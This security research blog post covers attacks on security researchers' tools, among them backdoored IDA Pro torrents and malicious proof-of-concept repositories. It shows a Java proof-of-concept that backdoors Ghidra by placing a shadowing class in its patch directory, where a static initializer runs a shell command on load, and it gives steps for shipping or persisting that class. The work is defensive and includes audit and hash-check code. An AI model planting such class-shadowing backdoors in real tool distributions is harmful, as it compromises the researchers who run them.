Analyzing Attack Opportunities Against Information Security Practitioners

In partnership with vx-underground, SentinelOne recently ran its first Malware Research Challenge, in which we asked researchers across the cybersecurity community to submit previously unpublished work to showcase their talents and bring their insights to a wider audience.

Today’s post is the second in a series highlighting the best entries. Jared Stroud (@DLL_Cool_J / Arch Cloud Labs) explores the risks security researchers face from APTs and other threat actors that compromise security research tools. The study includes discussion of a novel attack vector through the popular open-source reverse engineering platform, Ghidra.

Background

Attacks against the Information Security research community have historically ranged from fake proof-of-concept GitHub repos to modified Visual Studio project data resulting in the execution of PowerShell commands. In recent years, threat actors have begun targeting software heavily used within the Information Security community. Observed targeting techniques include directly selecting individuals from the security research community through phishing campaigns, or casting a wider opportunistic net by seeding illegal software torrents. Within the industry, circles of trust create an environment where the attack surface facing security practitioners is unique, and wider than one may think.

Sophisticated attacks focus on those who provide the most value to the Information Security community through blog posts, YouTube channels, and various other forms of information sharing. This article explores some of these historical attacks, identifies the attack surface of a researcher’s toolkit, and offers defensive strategies the community can adopt against such attacks.

Historical Targeted Attacks Against Software Used by Security Practitioners

Security company ESET reported in 2021 that threat actors linked to the DPRK backdoored IDA Pro torrents via malicious DLLs placed within the IDA Pro installation folder. Arch Cloud Labs does not condone the use of pirated software, but this software was likely chosen because of the probability of discovering additional security research on a victim’s machine. After all, why else choose IDA Pro? Other actors have backdoored popular resource-intensive video game torrents to make use of GPUs for cryptojacking campaigns. Per ESET’s tweets, upon launching the backdoored IDA Pro, a scheduled task is created that downloads an additional DLL named IDA Helper, which in turn fetches and executes a remotely hosted payload for follow-on post-exploitation activity.

Abusing DLL hijacking opportunities within Windows software is nothing new; what stands out is the threat actor’s intent to focus on the individuals who use IDA Pro, namely security researchers. By targeting torrented software, the threat actor also gains a degree of cover: even if an endpoint security product flags the software as malicious, a victim who downloaded it illegally may assume the detection is simply related to the torrent or its associated crack, and certainly not that they have been targeted by a nation-state adversary.

In early 2021, Google’s Threat Analysis Group (TAG) reported a targeted phishing campaign focusing on security researchers under the guise of asking known researchers to help the attacker finalize a proof-of-concept exploit. The supposed proof-of-concept was in fact a Visual Studio project that executed a PowerShell command to aid in data exfiltration from a security researcher’s lab environment. Numerous individuals on Twitter came forward saying they had established contact with the puppet accounts requesting help.

Those who seek to mentor and help one another in this industry should be applauded for their efforts, but they should also be wary of how that goodwill can be abused in elaborate phishing campaigns such as those reported by Google TAG. It is unlikely that these types of attacks will slow down in the coming years, and as security practitioners, understanding our tools of the trade and their associated attack surface is critical to protecting ourselves as well as our research. If one looks hard enough, most reverse engineering and digital forensics tools offer some way to achieve living-off-the-land style attacks. Arch Cloud Labs analyzed how these types of attacks could be applied to other widely used software, such as Ghidra, to enable a threat actor to target members of the security community, and will demonstrate such an attack later in this article.

Opportunistic Attacks During a CVE Crisis

Academic researchers from Leiden University recently published a paper stating that roughly 10% of proof-of-concept exploit repos on GitHub contain code meant to exfiltrate sensitive data from the targeted environment. If a researcher’s VM is not appropriately air-gapped or isolated to an individual project, the opportunity for sensitive data loss exists. During moments of crisis, such as a high-impact vulnerability (e.g., unauthenticated RCE), defenders seek to quickly understand, assess, and remediate the potential impact a given vulnerability may have on their organization. This leads to researchers publishing proof-of-concept (PoC) code on GitHub for use by the wider community.

As defenders rush to GitHub, this creates a “watering hole” scenario in which independent or otherwise unknown researchers have the opportunity to name a GitHub repo “PoC CVE-XXXX-XXXX” to capture incoming traffic for the latest vulnerability. In 2020, Andy Gill demonstrated a perfect example of this by creating a GitHub repo containing a bash script that would Rick Roll security researchers.

When seeking to determine whether a GitHub repo is trustworthy, how do you or your research colleagues decide? Do you audit the code, or do you simply look at the number of stars a repo has and think “this is probably fine”? The concept of trust in PoC exploit code is unique to the Information Security arena: outside of commercial or well-known offensive frameworks, how often is malicious software intentionally executed in your corporate environment? Ideally never, yet a framework or risk matrix for assessing a proof-of-concept’s legitimacy is an area the industry has yet to fully explore.

Identifying the Attack Surface of a Researcher’s Tools: Case Study Ghidra

Complex software such as Visual Studio or IDA Pro contains numerous ways to achieve code execution. Understanding a tool and how its functionality can be abused is critical to understanding the paths an adversary could take to compromise research environments.

Fundamentally, treating the file formats and complex archives of build systems as ways to “live off the land”, much as with LOLBINs, can lead to exciting new discoveries. Today, Arch Cloud Labs demonstrates how Ghidra, a popular reverse engineering tool released by the National Security Agency, could be leveraged for abuse in a similar vein to IDA Pro.

Ghidra versions are regularly released as zip files under the releases tab of the official GitHub repo. To backdoor Ghidra, one simply needs to place a Java .jar file containing a class with the same name as a legitimate, already existing Ghidra class into the ./Ghidra/patch directory of the zip file; that class’s functionality will then be overridden. Per the README within the Ghidra patch directory:

> This directory exists so that Ghidra releases can be patched, or overridden. Classes or jar files placed in this directory will be found and loaded *before* the classes that exist in the release jar files. One exception is that classes in the Utility module can not be patched in this way. The jar files will be sorted by name before being prepended to the classpath in order to have predictable class loading between Ghidra runs. This patch directory will be the very first patch entry on the classpath such that any individual classes will be found before classes in any of the patch jar files. The class files in this directory must be in the standard java package directory structure.

The patch directory provides an adversary a unique and low-effort opportunity to ship a backdoored zip archive to an unsuspecting researcher as part of a phishing campaign, or to have a second-stage payload drop additional payloads into the patch directory. To be clear, this is not an exploit, but rather abuse of default functionality within the Ghidra tool.

When a new version of Ghidra is launched for the first time on a machine, if a corresponding entry does not exist in the .ghidra folder within the user’s home directory, a user agreement followed by the Help menu is displayed by default. By identifying which Java classes are called during this flow (e.g., Help.java), this default behavior can be abused to get code to load and execute in a guaranteed fashion, provided the version number of the Ghidra release in the zip file is set to a non-existent build number (e.g., build ID 9999.9999). This combined functionality creates a unique opportunity for a phishing campaign. The workflow is visualized below.

The modified Help.java file shown below contains a simple proof-of-concept modification that echoes “pwn” to /tmp/pwn.txt.

Modified Help.java
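
For illustration, a minimal sketch of this kind of modification is shown below, assuming the payload is placed in a static initializer so that it runs as soon as the shadowed class is loaded by Ghidra. The package name, class body, and shell command are illustrative placeholders rather than a copy of Ghidra’s actual Help class.

```java
// Illustrative sketch only -- the package and class names stand in for whichever
// legitimate Ghidra class the attacker chooses to shadow via ./Ghidra/patch.
package help;

import java.io.IOException;

public class Help {
    // A static initializer executes as soon as the class loader resolves this
    // class, before any of its original functionality is invoked.
    static {
        try {
            // Proof-of-concept payload mirroring the demo: echo "pwn" to /tmp/pwn.txt.
            new ProcessBuilder("/bin/sh", "-c", "echo pwn > /tmp/pwn.txt").start();
        } catch (IOException e) {
            // Fail silently so Ghidra continues to behave normally for the victim.
        }
    }

    // ... the remainder of the original class would be reproduced here so the
    // application's expected behavior is preserved after the payload runs.
}
```

Compiled into a JAR, or dropped as a class file in the standard package directory structure, this file only needs to land in ./Ghidra/patch to be loaded ahead of the release jars, per the README quoted above.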

After modifying the Java file and completing the build steps outlined in the Ghidra build documentation, a malicious actor can take the compiled JAR, place it in the patch directory, and ship it with a Ghidra release of their choice. Alternatively, in a post-exploitation scenario, the JAR can be dropped into the patch directory as a means of persistence that triggers whenever Ghidra is launched. A more sophisticated payload is left as an exercise for the reader.

Protection Against Attacks and Validation of PoCs

Nothing listed below is groundbreaking or new, but these are practices not typically applied at the individual researcher level. After all, if these mechanisms are meant to secure large enterprise organizations, why not apply them to the research community as well?

Start by assessing the threat model for your research environment; this will enable you to make appropriate decisions about what additional steps are needed to protect yourself and your organization. Accidentally executing malware never results in a good day, and planning your environment, and an associated disaster recovery plan, for these events ahead of time helps you take steps to protect yourself. Beyond a disaster recovery plan for malware analysis environments, how can the community continuously check that the safeguards in place actually work? Just as the industry has adopted continuous vulnerability scanning for containers, code, and more, auditing custom malware and offensive security research environments is equally critical.
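
As a small example of what such continuous checking could look like, the sketch below flags anything unexpected in a Ghidra installation’s patch directory, which should normally contain little more than its README. The install path and README file name are assumptions for illustration.

```java
// Sketch: periodically flag unexpected entries in Ghidra's patch directory.
// The default install path and the README file name below are assumptions.
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.stream.Stream;

public class PatchDirAudit {
    public static void main(String[] args) throws IOException {
        Path patchDir = Paths.get(args.length > 0 ? args[0] : "/opt/ghidra/Ghidra/patch");
        try (Stream<Path> entries = Files.list(patchDir)) {
            entries.filter(p -> !p.getFileName().toString().equalsIgnoreCase("README.txt"))
                   .forEach(p -> System.out.println("[!] Unexpected patch entry: " + p));
        }
    }
}
```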

Software bills of materials (SBOMs) have become commonplace in discussions of deploying commercial software. The ability to map given versions of plugins and tools to their associated dependencies and hashes can help the research community prevent malicious DLLs, JARs, plugins, and the like from being slipped into software distributions. As new C2 frameworks are continually developed and adopt code from one another, the ability to track the provenance of scripts will help prevent maliciously modified scripts from ending up on your test system, as well as provide a way to acknowledge the original author.
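
As a rough sketch of this SBOM-style idea, the code below (Java 17+) compares SHA-256 digests of JARs under a tool or plugin directory against a pinned manifest of known-good hashes. The manifest format, one "<sha256> <relative path>" entry per line, and the directory layout are assumptions rather than an existing standard.

```java
// Sketch: verify plugin/tool JARs against a pinned manifest of SHA-256 hashes.
// Manifest format assumed here: one "<sha256> <relative path>" entry per line.
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.HexFormat;
import java.util.Map;
import java.util.stream.Collectors;
import java.util.stream.Stream;

public class JarManifestCheck {
    static String sha256(Path file) throws IOException, NoSuchAlgorithmException {
        MessageDigest md = MessageDigest.getInstance("SHA-256");
        return HexFormat.of().formatHex(md.digest(Files.readAllBytes(file)));
    }

    public static void main(String[] args) throws Exception {
        Path root = Paths.get(args[0]);      // directory holding the JARs to check
        Path manifest = Paths.get(args[1]);  // pinned list of known-good hashes

        // Expected hashes keyed by path relative to the tool directory.
        Map<String, String> expected = Files.readAllLines(manifest).stream()
                .map(line -> line.trim().split("\\s+", 2))
                .filter(parts -> parts.length == 2)
                .collect(Collectors.toMap(parts -> parts[1], parts -> parts[0]));

        try (Stream<Path> jars = Files.walk(root)) {
            for (Path jar : jars.filter(p -> p.toString().endsWith(".jar")).toList()) {
                String rel = root.relativize(jar).toString();
                String want = expected.get(rel);
                if (want == null) {
                    System.out.println("[!] JAR not present in manifest: " + rel);
                } else if (!want.equalsIgnoreCase(sha256(jar))) {
                    System.out.println("[!] Hash mismatch (possible tampering): " + rel);
                }
            }
        }
    }
}
```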

Finally, commercial software is cryptographically signed, so why not PoCs? PoCs hosted on GitHub can have their git commits signed with an individual’s PGP key. This additional level of verification gives trusted researchers a way to demonstrate that the tools they publish can be trusted by the wider Information Security community. Additionally, a web-of-trust model for GitHub, in which users vouch for a researcher’s PoCs, presents an interesting possibility to be explored.

Conclusion

As attacks become increasingly complex, the tools used to dissect and reveal the inner workings of campaigns will themselves likely be targeted. Understanding how these tools can be used beyond their intended functionality is critical to identifying advanced attacks against a given organization or group. The environment in which security research is conducted should ultimately be threat modeled to protect the researcher and their organization. Just as these practices are applied to enterprise organizations, they should filter down to the individual researcher.

